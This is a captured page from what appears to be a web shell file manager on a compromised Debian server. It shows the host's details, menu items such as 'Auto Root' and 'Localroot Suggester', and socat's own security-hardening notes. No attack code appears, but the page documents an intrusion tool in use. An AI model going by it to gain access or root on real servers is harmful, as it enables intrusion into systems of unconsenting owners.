Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
socat /
Delete
Unzip
Name
Size
Permission
Date
Action
examples
[ DIR ]
drwxr-xr-x
2024-10-04 13:32
BUGREPORTS
746
B
-rw-r--r--
2001-11-05 10:08
DEVELOPMENT.gz
3.15
KB
-rw-r--r--
2015-01-24 11:15
EXAMPLES.gz
5.98
KB
-rw-r--r--
2013-06-23 07:54
FAQ
3.83
KB
-rw-r--r--
2010-10-06 09:25
NEWS.Debian.gz
207
B
-rw-r--r--
2013-07-03 20:12
PORTING
3.02
KB
-rw-r--r--
2003-07-09 19:34
README.Debian
280
B
-rw-r--r--
2013-07-03 20:12
README.FIPS
2.59
KB
-rw-r--r--
2007-03-06 21:58
README.gz
5.06
KB
-rw-r--r--
2015-01-24 17:21
SECURITY
1.81
KB
-rw-r--r--
2002-10-03 07:09
changelog.Debian.gz
3.18
KB
-rw-r--r--
2017-07-14 15:52
changelog.gz
18.37
KB
-rw-r--r--
2017-07-14 15:52
copyright
2.69
KB
-rw-r--r--
2014-02-01 09:49
dest-unreach.css
298
B
-rw-r--r--
2010-10-06 09:25
index.html
538
B
-rw-r--r--
2017-07-14 15:52
socat-genericsocket.html
15.16
KB
-rw-r--r--
2013-06-23 07:54
socat-multicast.html
14.59
KB
-rw-r--r--
2013-06-23 07:54
socat-openssltunnel.html
8.31
KB
-rw-r--r--
2008-10-10 21:42
socat-tun.html
6.54
KB
-rw-r--r--
2013-06-23 08:16
socat.html
220.17
KB
-rw-r--r--
2015-01-24 17:31
xio.help.gz
28.1
KB
-rw-r--r--
2013-06-23 08:16
Save
Rename
Tips for using socat in secured environments: * Configure socat to only enable the required features, e.g. to protect your filesystem from any accesses through socat: make distclean ./configure --disable-file --disable-creat --disable-gopen \ --disable-pipe --disable-unix --disable-exec --disable-system use "socat -V" to see what features are still enabled; see ./configure --help for more options to disable * Do NOT install socat SUID root or so when you have untrusted users or unprivileged daemons on your machine, because the full install of socat can override arbitrary files and execute arbitrary programs! * Set logging to "-d -d" (in special cases even higher) * With files, protect against symlink attacks with nofollow (Linux), and avoid accessing files in world-writable directories like /tmp * When listening, use bind option (except UNIX domain sockets) * When listening, use range option (currently only for IP4 sockets) * When using socat with system, exec, or in a shell script, know what you do * With system and exec, use absolute pathes or set the path option * When starting programs with socat, consider using the chroot option (this requires root, so use the substuser option too). * Start socat as root only if required; if so, use substuser option Note: starting a SUID program after applying substuser or setuid gives the process the SUID owner, which might give root privileges again. * Socat, like netcat, is what intruders like to have on their victims machine: once they have gained a toehold they try to establish a versatile connection back to their attack base, and they want to attack other systems. For both purposes, socat could be helpful. Therefore, it might be useful to install socat with owner/permissions root:socatgrp/750, and to make all trusted users members of group socatgrp.